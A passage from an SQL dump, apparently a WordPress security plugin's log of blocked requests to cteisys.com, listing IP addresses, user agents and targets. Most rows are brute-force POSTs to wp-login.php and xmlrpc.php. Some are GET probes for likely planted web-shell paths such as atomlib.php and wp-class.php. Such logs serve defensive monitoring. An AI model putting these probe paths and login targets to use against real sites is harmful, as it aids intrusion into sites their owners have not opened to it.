Firefox\\/96\"}','bEginyxDGNfSvTO2VcarA4L1',0,1664244608.6073,18798,'','POST',403,0,515,0,1,'',0),('104.254.90.195',1761499843,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jhcNUVGdlx352XIE8AM0fw64',0,1664244430.6725,2513,'','POST',403,0,515,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tfEG3LjQMoz8NlBOehwWsFaR',0,1664247657.7589,1365,'','POST',403,0,515,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4kLlumPiC23VBHTDhaZ5wQxf',0,1664247623.7689,2846,'','POST',403,0,515,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hmBDwUaLnXjMv5WH7PlecbFq',0,1664251599.2951,16482,'','POST',403,0,515,0,1,'',0),('159.89.2.220',2673410780,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','habvm70eXxRICQtU3D26EysN',0,1664251601.8402,13762,'','POST',403,0,515,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','LxGI0QkNF5u6mZsXyASdWEtl',0,1664251261.4804,1938,'','POST',403,0,600,0,1,'',0),('45.252.250.41',771553833,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LWBS5IqdvVzYAr0sEymaePCN',0,1664255865.6216,2847,'','POST',403,0,515,0,1,'',0),('128.199.60.194',2160540866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WAeUoRQHFlcta69JXEyvOpST',0,1664255491.2550,2852,'','POST',403,0,515,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','v1k7NWLJfdSz8soZYipIODKA',0,1664255171.9410,531,'','POST',403,0,600,0,1,'',0),('155.133.142.66',2609221186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Oqsj284tDmBhw03kbcXSFuUn',0,1664255148.4275,2529,'','POST',403,0,515,0,1,'',0),('139.59.73.237',2335918573,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M2uLBkopsUD6OvZnC7yibaFg',0,1664255170.5001,542,'','POST',403,0,515,0,1,'',0),('213.152.161.40',3583549736,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DKz0GBWC3YqXMkJ2gHxPAN56',0,1664258807.2464,11801,'','POST',403,0,515,0,1,'',0),('178.62.108.24',2990435352,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d6ln4E7G1sW2qo3OgbVckaP0',0,1664262803.8562,12575,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','PkNvcj9CzbJGdXmpefRWHlUO',0,1664262798.5783,17071,'','POST',403,0,600,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','69NPX2QBjfYWJsa843zHMFEn',0,1664262191.2433,647,'','POST',403,0,600,0,1,'',0),('213.136.93.169',3582483881,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rJBT7mft8w3GIRD4vXHA5ZQ1',0,1664262200.9040,641,'','POST',403,0,600,0,1,'',0),('198.136.54.132',3330815620,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bRA13h8agvslptKEjOqCoQWi',0,1664266153.4222,510,'','POST',403,0,600,0,1,'',0),('91.249.163.48',1543086896,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','w6lIFA0ngd8JzPeajyOY52N9',0,1664265710.5525,10210,'','POST',403,0,600,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0SGyTzAWkwQCFgELBXrZKjMI',0,1664269599.8488,536,'','POST',403,0,600,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fEvUGrkjC6PZ3WJyK5h07IQV',0,1664269581.9822,542,'','POST',403,0,600,0,1,'',0),('104.248.80.191',1761104063,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fVnh6UiuNXC4M3D0P9KbOgF5',0,1664273783.0376,476,'','POST',403,0,600,0,1,'',0),('180.211.99.217',3033752537,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FXgpkncQ3yK5lbauzR8TC2mP',0,1664273757.4950,531,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','QSLEzKHD43AmlsdjWo9TJZfY',0,1664273439.0013,17201,'','POST',403,0,600,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','a72Bmr8YCcPZMdQRst01jXxN',0,1664273041.7599,570,'','POST',403,0,600,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','HWSiV2LgQNuyfZYDd9IEol5e',0,1664276686.0781,6056,'','POST',403,0,600,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pAPUa2mwuj8SI1t0gkJlGdYD',0,1664276542.8768,569,'','POST',403,0,600,0,1,'',0),('51.15.160.148',856662164,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8Axh4UTLly1H3DRmO2XYZw7n',0,1664276516.0557,2681,'','POST',403,0,600,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','F71D06drzHYTqvGBLcf5Jgp9',0,1664280255.6982,5460,'','POST',403,0,515,0,1,'',0),('213.149.103.132',3583338372,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FYjWmyLTJaegUcvIrOiXfwCP',0,1664280062.2094,641,'','POST',403,0,600,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LmPZ3D1I6xdl7uTonV5a4rHy',0,1664280048.5197,525,'','POST',403,0,600,0,1,'',0),('142.93.54.10',2388473354,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','YNwlcoQ01aqFGLeAx6ZyRp3i',0,1664284543.3632,17714,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','dRSODxlgfs25LPNnFH89pVW4',0,1664305197.9847,2511,'','POST',403,0,600,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','8DB0rN17eQnUuXvbECqKWVSl',0,1664308925.7415,1504,'','POST',403,0,515,0,1,'',0),('20.101.71.221',342181853,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','DzwUf0P8uYlIR6VHcZLCidBW',0,1664317618.1056,1311,'','POST',403,0,600,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','t6qpXE20QhmUwLJb8jBzaxeW',0,1664318532.7782,2268,'','POST',403,0,515,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','pi2ql9JFm6IREubTxcoaXs8K',0,1664316505.5343,485,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','Yg7rbBM0cxv2Zz9GIFwUa6Ek',0,1664316482.0032,11430,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','6Pmw9cfqszWeFyLUaEDQxknG',0,1664329028.1728,1308,'','POST',403,0,600,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','QtqSNvj4sKzUaIcnMCAEgYiH',0,1664329004.0843,1767,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','g6nAvuK0c2qPap3bJtxSsfF1',0,1664327883.2242,1387,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','v76carUWs3w8GM0LnXJu2zdS',0,1664327858.2855,6431,'','POST',403,0,600,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','FVZju4aNbs82DKLJYxkrSeoU',0,1664330959.4659,523,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','IPCsLj1fOn60lgDX9xJTH7mu',0,1664330954.4337,569,'','POST',403,0,515,0,1,'',0),('185.107.112.7',3110825991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','rDQLOTvotZue405SpACj3yEw',0,1664330947.2680,2234,'','POST',403,0,515,0,1,'',0),('137.63.71.51',2302625587,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','B1CiEXGzFb5SZV6LUo9Icepq',0,1664334009.7195,14239,'','POST',403,0,515,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','ZcS4K5MyXUIGdTtHVbzPqoAl',0,1664339533.8133,588,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','dSM8mZRtv7usD65KYXH02G1e',0,1664338358.7365,450,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','yUWqNvkracdt9OJxIPSBnH6o',0,1664338336.8934,17740,'','POST',403,0,600,0,1,'',0),('67.205.39.9',1137518345,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','0KE1oGJ5mbYkTDh46UrIgSuF',0,1664342082.8072,511,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','dmFQ3KJ0nkxz4VpoNXfejlHv',0,1664342058.0523,17650,'','POST',403,0,600,0,1,'',0),('199.249.230.12',3355043340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mwB8akR53NCIhGJqH1M6cTZy',0,1664341419.7009,18528,'','POST',403,0,515,0,1,'',0),('135.181.142.230',2276822758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','5Trbf20t3mBLMC78uxVXvSdW',0,1664345785.3281,15572,'','POST',403,0,515,0,1,'',0),('120.27.133.69',2015069509,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','39npAkQVz265uoYgwvyjRfcS',0,1664345627.5483,17992,'','POST',403,0,600,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','HeoIybQ9aBDuF082YUsfqndx',0,1664387146.7600,1267,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','kjyfD8u2JHx34sheg6MrU9Zb',0,1664387136.6121,4012,'','POST',403,0,515,0,1,'',0),('124.222.194.56',2094973496,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','fwuBzTVZxWStGeyF3PjlK7Y4',0,1664387122.2140,18075,'','POST',403,0,515,0,1,'',0),('178.128.102.185',2994759353,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','pYLKbSylQPUFG4jrqZu5okXa',0,1664387133.4011,6882,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','7t1QF5fWD4zZkBIKvPGOx3HJ',0,1664383784.8044,509,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','iRup5WK18HwfnvGMOjIl2FbE',0,1664383777.5649,564,'','POST',403,0,515,0,1,'',0),('82.165.86.198',1386567366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','B8Odt6MG1PxfU3aKbERqsyJC',0,1664383768.3902,1007,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','TGDvszC93pP87qEhKftXAjQZ',0,1664383768.0049,1205,'','POST',403,0,515,0,1,'',0),('178.210.84.161',3000128673,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','LtcABoJbnURdZw3x2qug5YDO',0,1664383759.7246,521,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JDH8gL34lnscr5dzR7K9whqb',0,1664383738.4271,15762,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','0rbXJD8Vc1zQ6e7H3vtqEoBw',0,1664383736.6183,17519,'','POST',403,0,515,0,1,'',0),('128.127.106.229',2155834085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','oWFMLjdxmDU6X3SquAesRPO0',0,1664382669.9942,14019,'','POST',403,0,515,0,1,'',0),('18.140.64.25',311181337,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','yQomgRJvcEFrNeAq5ufwUp14',0,1664382670.0092,14001,'','POST',403,0,515,0,1,'',0),('223.165.66.70',3752149574,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','0JbIiXKPpd4eFrEGhOVxcUQ6',0,1664382666.5664,17440,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','3aGT2E74cujDhReMoUH81LbW',0,1664382657.1678,617,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','SlG0PtZqKIaufk5EB16UhCRJ',0,1664382649.9033,1531,'','POST',403,0,515,0,1,'',0),('82.165.87.109',1386567533,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','8gXVRAFp4OSemf6Q3iNh5KHT',0,1664382646.2878,4668,'','POST',403,0,515,0,1,'',0),('89.238.150.43',1508808235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kBq9L2PGe3RgSiUQZbVucdyz',0,1664382470.9089,18912,'','POST',403,0,515,0,1,'',0),('134.19.179.203',2249438155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1OIjLHF02BQDE5cVbA7PmvqY',0,1664381255.3618,18219,'','POST',403,0,515,0,1,'',0),('176.9.74.94',2953398878,'','https://cteisys.com/wp-admin/css/atomlib.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0qTfFOYdj5X7bGt1ea9r6yhn',0,1664380892.8983,323,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','http://cteisys.com/wp-admin/css/atomlib.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','3HAQi9remaP2UlpKGCY6XByn',0,1664380889.4000,278,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','https://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','RBZt0WuOwKCgiS8AvzMhDEkY',0,1664380886.0082,287,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vbujD3mPXVUAr4WQ0owsIlnL',0,1664380882.2464,324,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','1foVsYz4DLcHngSr2IapMOhQ',0,1664380878.4860,281,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','VlD8RjBy7xb3sc5L6GEPOSoh',0,1664380875.2753,352,'','GET',403,0,700,0,1,'',0),('149.56.26.54',2503481910,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','jYd38eNO4oK5hRtMCl0aIn6z',0,1664380861.5518,1458,'','POST',403,0,600,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','cwFkKGNJ2WOvqdYR6auBEeQT',0,1664380836.6004,3503,'','POST',403,0,600,0,1,'',0),('193.141.65.121',3247260025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','dnKaAgDwEqZLOc6uFkIzeQMR',0,1664380546.3397,1271,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','qPVNowOpeLlCEdrtA18S2Q6g',0,1664380536.4178,688,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','Axy5r8icgHnemI0PdwabfvqK',0,1664380539.5938,4846,'','POST',403,0,515,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','YRz4x19agE36slAmPpnXOIoc',0,1664380528.9934,557,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile 